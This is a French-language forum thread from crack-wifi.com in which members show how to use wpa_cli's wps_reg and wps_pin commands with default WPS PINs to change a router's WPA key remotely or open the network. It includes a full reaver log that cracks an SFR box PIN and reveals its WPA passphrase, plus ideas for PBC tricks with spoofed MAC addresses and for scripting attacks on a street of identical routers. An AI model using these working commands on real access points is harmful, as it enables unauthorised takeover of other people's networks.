Crack-wifi.com FORUM

LE FORUM DU SITE

Wifi, Backtrack, crack WEP et WPA...

Vous n'êtes pas identifié(e).  

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#1 19-10-2013 03:13:56

kcdtv
Membre d'honneur
Lieu : Internacionaluña
Inscription : 31-03-2010
Messages : 4 246

wpa_cli/wpa_supplicant - contrôler les bases du WPS en système linux

Suite a un topic ouvert par koala, notre ami arboricole ( c'était juste pour placer le mot une fois dans ma vie, le topic c'est celui-ci : nouvelle box sfr nb6 ), nous avons pensé qu'il serait bien de reprendre un peu l'étude du WPS en regardant les possibilités offertes par wpa_cli, une commande interactive pleine de ressources.

Comme vous le savez sans doute wpa_supplicant est "the package" pour gérer les connexions WPA sous linux
Ce qui est moins connu c'est que wpa_supplicant dispose d'une commande "interacive" wpa_cli, qui vous permetra d'intervenr en vif au beau milieu milieu de votre sortie en console permettant une interaction tràs fluide

il n'y pas beaucoup de documentation sur wpa_cli et wps et pourtant le support WPS existe depuis 2008

Quelques articles sur la web ont attirés mon attention:

  - Wi-Fi Protected Setup in the wpa_supplicant
      sur la méthode push button

  - How to connect to Wi-Fi AP through WPS?


  - wpa_supplicant and Wi-Fi Protected Setup (WPS)

et comme vous pouvez le constater wpa_cli dispose d'une bonne aide

> help
commands:
  status [verbose] = get current WPA/EAPOL/EAP status
  ping = pings wpa_supplicant
  relog = re-open log-file (allow rolling logs)
  note <text> = add a note to wpa_supplicant debug log
  mib = get MIB variables (dot1x, dot11)
  help = show this usage help
  interface [ifname] = show interfaces/select interface
  level <debug level> = change debug level
  license = show full wpa_cli license
  quit = exit wpa_cli
  set = set variables (shows list of variables when run without arguments)
  get <name> = get information
  logon = IEEE 802.1X EAPOL state machine logon
  logoff = IEEE 802.1X EAPOL state machine logoff
  pmksa = show PMKSA cache
  reassociate = force reassociation
  preauthenticate <BSSID> = force preauthentication
  identity <network id> <identity> = configure identity for an SSID
  password <network id> <password> = configure password for an SSID
  new_password <network id> <password> = change password for an SSID
pin <network id> <pin> = configure pin for an SSID
  otp <network id> <password> = configure one-time-password for an SSID
  passphrase <network id> <passphrase> = configure private key passphrase
    for an SSID
  bssid <network id> <BSSID> = set preferred BSSID for an SSID
  blacklist <BSSID> = add a BSSID to the blacklist
  blacklist clear = clear the blacklist
  blacklist = display the blacklist
  log_level <level> [<timestamp>] = update the log level/timestamp
  log_level = display the current log level and log options
  list_networks = list configured networks
  select_network <network id> = select a network (disable others)
  enable_network <network id> = enable a network
  disable_network <network id> = disable a network
  add_network = add a network
  remove_network <network id> = remove a network
  set_network <network id> <variable> <value> = set network variables (shows
    list of variables when run without arguments)
  get_network <network id> <variable> = get network variables
  save_config = save the current configuration
  disconnect = disconnect and wait for reassociate/reconnect command before
    connecting
  reconnect = like reassociate, but only takes effect if already disconnected
  scan = request new BSS scan
  scan_results = get latest scan results
  bss <<idx> | <bssid>> = get detailed scan result info
  get_capability <eap/pairwise/group/key_mgmt/proto/auth_alg> = get capabilies
  reconfigure = force wpa_supplicant to re-read its configuration file
  terminate = terminate wpa_supplicant
  interface_add <ifname> <confname> <driver> <ctrl_interface> <driver_param>
    <bridge_name> = adds new interface, all parameters but <ifname>
    are optional
  interface_remove <ifname> = removes the interface
  interface_list = list available interfaces
  ap_scan <value> = set ap_scan parameter
  scan_interval <value> = set scan_interval parameter (in seconds)
  bss_expire_age <value> = set BSS expiration age parameter
  bss_expire_count <value> = set BSS expiration scan count parameter
  stkstart <addr> = request STK negotiation with <addr>
  ft_ds <addr> = request over-the-DS FT with <addr>
wps_pbc [BSSID] = start Wi-Fi Protected Setup: Push Button Configuration
  wps_pin <BSSID> [PIN] = start WPS PIN method (returns PIN, if not hardcoded)
  wps_check_pin <PIN> = verify PIN checksum
  wps_cancel Cancels the pending WPS operation
  wps_reg <BSSID> <AP PIN> = start WPS Registrar to configure an AP
  wps_ap_pin [params..] = enable/disable AP PIN
  wps_er_start [IP address] = start Wi-Fi Protected Setup External Registrar
  wps_er_stop = stop Wi-Fi Protected Setup External Registrar
  wps_er_pin <UUID> <PIN> = add an Enrollee PIN to External Registrar
  wps_er_pbc <UUID> = accept an Enrollee PBC using External Registrar
  wps_er_learn <UUID> <PIN> = learn AP configuration
  wps_er_set_config <UUID> <network id> = set AP configuration for enrolling
  wps_er_config <UUID> <PIN> <SSID> <auth> <encr> <key> = configure AP
  ibss_rsn <addr> = request RSN authentication with <addr> in IBSS
  suspend = notification of suspend/hibernate
  resume = notification of resume/thaw
  drop_sa = drop SA without deauth/disassoc (test command)
  roam <addr> = roam to the specified BSS
  fetch_anqp = fetch ANQP information for all APs
  stop_fetch_anqp = stop fetch_anqp operation
  interworking_select [auto] = perform Interworking network selection
  interworking_connect <BSSID> = connect using Interworking credentials
  anqp_get <addr> <info id>[,<info id>]... = request ANQP information
  sta_autoconnect <0/1> = disable/enable automatic reconnection
  tdls_discover <addr> = request TDLS discovery with <addr>
  tdls_setup <addr> = request TDLS setup with <addr>
  tdls_teardown <addr> = tear down TDLS with <addr>
  signal_poll = get signal parameters
> quit


Pour lancer wpa_cli

sudo wpa_cli

Pour être constructif et ne pas parler de ce qui fâche, se connecter, je peux confirmer que le tool fonctionne parfaitement si vous voulez changer à distance le pass WPA grâce qu PIN WPS ( vous pouvez aussi mettre le routeur en WEP ou Open, c'est au choix )

vous lancez donc wpa_cli et deve rentrer la ligne suivante

wps_reg <BSSID> <PIN> <ESSID> <SECURITé> <Nouvelle clef WPA>

exemple

wps_reg 00:1A:2B:3C:4D:5E 12345670 WLAN_MAISON WPA2PSK CCMP NeW§%Pa55W0rD/?;+à

1iNv6.png

a partir du moment ou voyez "EVENT - CONNECTED" ( en vert } c'est que vous avez réussi la transaction du PIN
là j'ai mis le PIN comme clef WPA, je me suis retrouvé déconnecté, un petit reaver

et j'en profite pour déposer au passage le record du monde de la cef WPA la plus vite tombée: 2 secondes    


laugh.gif


1iNyj.png


j'appele demain le guinees boock


conclusion ; si on oeut changer la conf on devrait quand même réussir à se connecter ( sans faire ce que j'ai fais, ça compte pas,changer le pass pour le PIN )

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#2 19-10-2013 15:09:20

coyotus
Membre Irremplaçable
Lieu : fort fort lointain
Inscription : 05-08-2010
Messages : 884

Re : wpa_cli/wpa_supplicant - contrôler les bases du WPS en système linux

J'ai une question

tu met "wps_reg <BSSID> <PIN> <ESSID> <SECURITé> <Nouvelle clef WPA>"

Mais dans l'exemple tu met "wps_reg <BSSID> <PIN> <ESSID> <SECURITé> "CCMP" <Nouvelle clef WPA>"

Que veux dire CCMP ? est-ce bien ceci -> Counter-Mode/CBC-Mac protocol


1310812721.gif

Hors Ligne

#3 19-10-2013 19:38:10

kcdtv
Membre d'honneur
Lieu : Internacionaluña
Inscription : 31-03-2010
Messages : 4 246

Re : wpa_cli/wpa_supplicant - contrôler les bases du WPS en système linux

Tout à fait coyotus

Je n'ai as pas été précis, autant pour moi, voici la syntaxe telle quelle sortie de l'article( le troisième) mis en lien au dessus

wpa_cli wps_reg <AP BSSID> <AP PIN> <new SSID> <auth> <encr> <new key>

en fait pour ne pas avoir de soucis à l'heure de rentrer les données il vous suffit de lancer un scan dans wpa_cli et toute l'info nécessaire sera là.

scan
scan_results

1iRp2.png

Hors Ligne

#4 20-10-2013 13:16:37

koala
Membre d'honneur
Lieu : In the sky
Inscription : 03-09-2010
Messages : 2 316

Re : wpa_cli/wpa_supplicant - contrôler les bases du WPS en système linux

Salut ! smile

Ce que je vais dire est peut-etre stupide mais le fait que l'on arrive pas a se connecter a certain moment ne viendrai pas du système d'auth installé sur certaine box?

Quel conf WPS as-tu dans ta box exactement?

Hors Ligne

#5 21-10-2013 14:46:03

kcdtv
Membre d'honneur
Lieu : Internacionaluña
Inscription : 31-03-2010
Messages : 4 246

Re : wpa_cli/wpa_supplicant - contrôler les bases du WPS en système linux

Dans le cas présent je ne crois vraiment pas vu qye je peux me connecter avec windows et je peux l'attaquer avec reaver.
La configuration c'est celle par défaut, le router a un PIN générique par défaut avec le WPS activé en mode PSB et en mode PIN.
Logiquement il ne devrait pas y avoir de problèmes......

Hors Ligne

#6 21-10-2013 18:05:28

koala
Membre d'honneur
Lieu : In the sky
Inscription : 03-09-2010
Messages : 2 316

Re : wpa_cli/wpa_supplicant - contrôler les bases du WPS en système linux

En tout cas j'espère que d'autres qui ont le meme problème que nous se manifesteront car en ayant fait le tour plusieurs fois de la chose je vois vraiment pas ce qui bloque hmm

Hors Ligne

#7 05-04-2014 07:04:20

koala
Membre d'honneur
Lieu : In the sky
Inscription : 03-09-2010
Messages : 2 316

Re : wpa_cli/wpa_supplicant - contrôler les bases du WPS en système linux

Salut ! smile

Je confirme que cette méthode marche bien avec la neufbox6:

wps_reg 30:7e:cb:ae:a3:47 22005243 SFR_A340 WPA2PSK CCMP
OK
<3>CTRL-EVENT-SCAN-RESULTS 
<3>WPS-AP-AVAILABLE 
<3>CTRL-EVENT-SCAN-RESULTS 
<3>WPS-AP-AVAILABLE 
<3>CTRL-EVENT-SCAN-RESULTS 22005243 SFR_A340 WPA2PSK CCMP
<3>WPS-AP-AVAILABLE e:a3:4722005243 SFR_A340 WPA2PSK CCMP
<3>CTRL-EVENT-SCAN-RESULTS  22005243 SFR_A340 WPA2PSK CCMP
<3>WPS-AP-AVAILABLE e:a3:44 22005243 SFR_A340 WPA2PSK CCMP
> wps_reg 30:7e:cb:ae:a3:44 22005243 SFR_A340 WPA2PSK CCMP
OK
<3>CTRL-EVENT-SCAN-RESULTS 
<3>WPS-AP-AVAILABLE 
<3>SME: Trying to authenticate with 30:7e:cb:ae:a3:44 (SSID='SFR_A340' freq=2437 MHz)
<3>Trying to associate with 30:7e:cb:ae:a3:44 (SSID='SFR_A340' freq=2437 MHz)
<3>Associated with 30:7e:cb:ae:a3:44
<3>CTRL-EVENT-EAP-STARTED EAP authentication started
<3>CTRL-EVENT-EAP-PROPOSED-METHOD vendor=14122 method=1
<3>CTRL-EVENT-EAP-METHOD EAP vendor 14122 method 1 (WSC) selected
<3>WPS-CRED-RECEIVED 
<3>WPS-SUCCESS 

Reaver:

 sudo reaver -i mon0 -b 30:7e:cb:ae:a3:44 -p 22005243 -vv

Reaver v1.4 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]>

[+] Waiting for beacon from 30:7E:CB:AE:A3:44
[+] Switching mon0 to channel 6
[+] Associated with 30:7E:CB:AE:A3:44 (ESSID: SFR_A340)
[+] Trying pin 22005243
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x02), re-trying last pin
[+] Trying pin 22005243
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M5 message
[+] Sending M6 message
[+] Received M7 message
[+] Sending WSC NACK
[+] Sending WSC NACK
[+] Pin cracked in 10 seconds
[+] WPS PIN: '22005243'
[+] WPA PSK: 'htentu4rgestorkhtflc'
[+] AP SSID: 'SFR_A340'
[+] Nothing done, nothing to save.

Tu ma mis 8 secondes d'avance c'est pas cool lol

Bon par contre impossible de se connecter avec l'adresse mac spoofé du client en meme temps que lui sur l'ap via la méthode PBC.Mais ça veut pas dire qu'on peut pas s'amuser un peu avec la méthode PBC quand meme tongue.

A savoir (je sais pas si c'est comme ça chez orange faudra que je test sur mes livebox), mais chez sfr quand vous utilisez le PBC en mode de connexion avec wpa_cli vous ne pouvez pas utiliser le bssid donné sous airodump-ng car c'est sur une autre interface que ça se passe: (notez le  30:7e:cb:ae:a3:44)

<3>CTRL-EVENT-SCAN-RESULTS 
<3>WPS-AP-AVAILABLE-PBC 
> wps_pbc 30:7e:cb:ae:a3:47 
OK
<3>CTRL-EVENT-SCAN-RESULTS 
<3>WPS-AP-AVAILABLE-PBC 
<3>CTRL-EVENT-SCAN-RESULTS  
<3>WPS-AP-AVAILABLE-PBC :47 
> wps_pbc 30:7e:cb:ae:a3:47 
OK

ça tourne en boucle et l'ap ignore le client, mais si on regarde de plus près:

> wps_pbc any 30:7e:cb:ae:a3:47
OK
<4>Failed to initiate AP scan
<3>CTRL-EVENT-SCAN-RESULTS 
<3>WPS-AP-AVAILABLE-PBC 
<3>SME: Trying to authenticate with 30:7e:cb:ae:a3:44 (SSID='SFR_A340' freq=2437 MHz)
<3>Trying to associate with 30:7e:cb:ae:a3:44 (SSID='SFR_A340' freq=2437 MHz)
<3>Associated with 30:7e:cb:ae:a3:44
<3>CTRL-EVENT-EAP-STARTED EAP authentication started
<3>CTRL-EVENT-EAP-PROPOSED-METHOD vendor=14122 method=1
<3>CTRL-EVENT-EAP-METHOD EAP vendor 14122 method 1 (WSC) selected
<3>WPS-CRED-RECEIVED 
<3>WPS-SUCCESS 
<3>CTRL-EVENT-EAP-FAILURE EAP authentication failed
<3>CTRL-EVENT-DISCONNECTED bssid=00:00:00:00:00:00 reason=3
<3>CTRL-EVENT-SCAN-RESULTS 
<3>WPS-AP-AVAILABLE 
<3>SME: Trying to authenticate with 30:7e:cb:ae:a3:44 (SSID='SFR_A340' freq=2437 MHz)
<3>Trying to associate with 30:7e:cb:ae:a3:44 (SSID='SFR_A340' freq=2437 MHz)
<3>Associated with 30:7e:cb:ae:a3:44
<3>WPA: Key negotiation completed with 30:7e:cb:ae:a3:44 [PTK=CCMP GTK=CCMP]
<3>CTRL-EVENT-CONNECTED - Connection to 30:7e:cb:ae:a3:44 completed (reauth) [id=1 id_str=]

Vous croyez que vous avez réussi... ben non car malgrès cette ligne:

<3>CTRL-EVENT-CONNECTED - Connection to 30:7e:cb:ae:a3:44 completed (reauth) [id=1 id_str=]

et ce screenshoot dans l'interface de la box:
53a0.bmp

Vous n'etes pas proprement dit connecté pas d'adresse IP, ping vers le routeur nul et la connexion se coupe rapidement dès que le WPS passe en TIMEOUT...
Je met a disposition le fichier cap pour ceux qui veulent y jeter un oeil.
WPS PBC et SFR auth


Ce que je veux dire c'est que cette situation m'ai déja arrivé auparavant.(voir le tout premier post du sujet projet rogue AP wps )


Je tiens a préciser que j'avais vraiment réussi a faire une reconnexion automatique en WPA2 il y a de ça bientot 2 ans en utilisant le WPS/PBC.Et les symptomes ici après que le bouton ai été appuyer, sont exactement les memes, pas de ping, connexion très courte, table arp floue etc...

Ce qui me connaisse sauront ou je veux en venir big_smile

Dernière modification par koala (05-04-2014 07:12:18)

Hors Ligne

#8 05-04-2014 10:57:06

kcdtv
Membre d'honneur
Lieu : Internacionaluña
Inscription : 31-03-2010
Messages : 4 246

Re : wpa_cli/wpa_supplicant - contrôler les bases du WPS en système linux

Tu ma mis 8 secondes d'avance c'est pas cool

MOI j'ai pas eu un erreur code numéro two lalalalère !

A savoir (je sais pas si c'est comme ça chez orange faudra que je test sur mes livebox), mais chez sfr quand vous utilisez le PBC en mode de connexion avec wpa_cli vous ne pouvez pas utiliser le bssid donné sous airodump-ng car c'est sur une autre interface que ça se passe: (notez le  30:7e:cb:ae:a3:44)

C'est fou ça parceque le WPS est annoncé dans les probes avec le bssid utilisé par le PA...

<3>WPA: Key negotiation completed with 30:7e:cb:ae:a3:44 [PTK=CCMP GTK=CCMP]
<3>CTRL-EVENT-CONNECTED - Connection to 30:7e:cb:ae:a3:44 completed (reauth) [id=1 id_str=]

Limite on s'en fout d'etre connecté si on récupère la clef... on a l'air de revenir à notre problème lié au fait de lancer correcteemnt wpa_supplicant en mode deamon pour rédiger sur le vif le fichier de configuration pour se connecter.
Mais le procédé WPS semble bien valide jusqu'à l'échange de la clef non?

Key negotiation completed with 30:7e:cb:ae:a3:44


1iNv6.png

le message en vert synonyme de succès de notre transaction WPS

Bon par contre impossible de se connecter avec l'adresse mac spoofé du client en meme temps que lui sur l'ap via la méthode PBC.Mais ça veut pas dire qu'on peut pas s'amuser un peu avec la méthode PBC quand même .

Ok, qui ne tente rien... smile

Hors Ligne

#9 05-04-2014 12:30:00

koala
Membre d'honneur
Lieu : In the sky
Inscription : 03-09-2010
Messages : 2 316

Re : wpa_cli/wpa_supplicant - contrôler les bases du WPS en système linux

Je viens d'essayer sur la livebox, la c'est une autre affaire... Impossible de s'y connecter via le pin, ils ont du faire une MAJ, mais toujours possible si on appui sur le bouton.

J'ai noté une commande intéressante mais un peu barbare certes big_smile

wps_pin any 12345670

j'imagine une rue rempli de routeur du meme model avec le meme pin... le tout avec un petit scrip automatisé ça pourrait faire mal tongue

Sinon je viens de tester également la modification du réseau et de sa clé mais la ça se bloque a ce niveau:

CTRL-EVENT-EAP-METHOD EAP Vendor 14122 method 1 (WSC) selected

Ps: j'ai pas pu te répondre sur lampi j'ai un problème avec les MP mais merci des précisions

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

Sujets similaires

Discussion Réponses Vues Dernier message
0 151 21-11-2016 23:08:49 par muts
25 1113 07-11-2016 20:09:33 par M1ck3y
8 513 19-10-2016 14:43:06 par kcdtv
3 357 19-10-2016 06:57:49 par rouzzz
Épinglée :
Épinglée :: Linux Deploy -> Kali Linux par romeoandjuliet
4 7497 03-10-2016 18:20:06 par hellblob

Pied de page des forums


Le coin des bonnes affaires, achats informatiques:


|   Alfa 1000 mW AWUS036H   |    Linksys WRT54GL   |    Misco, informatique   |   
 |    Ebay   |    PC portables   |    PC Gamers & Tuning   |    Cles USB   |   
|   Disques durs externes 2 To   |   
|   Wifi-highpower.com   |   


Server Stats - [ Generated in 0.028 seconds ]   Forum Stat - [ Most users ever online on the forum was : 150 on 20-09-2009 17:06:59 ]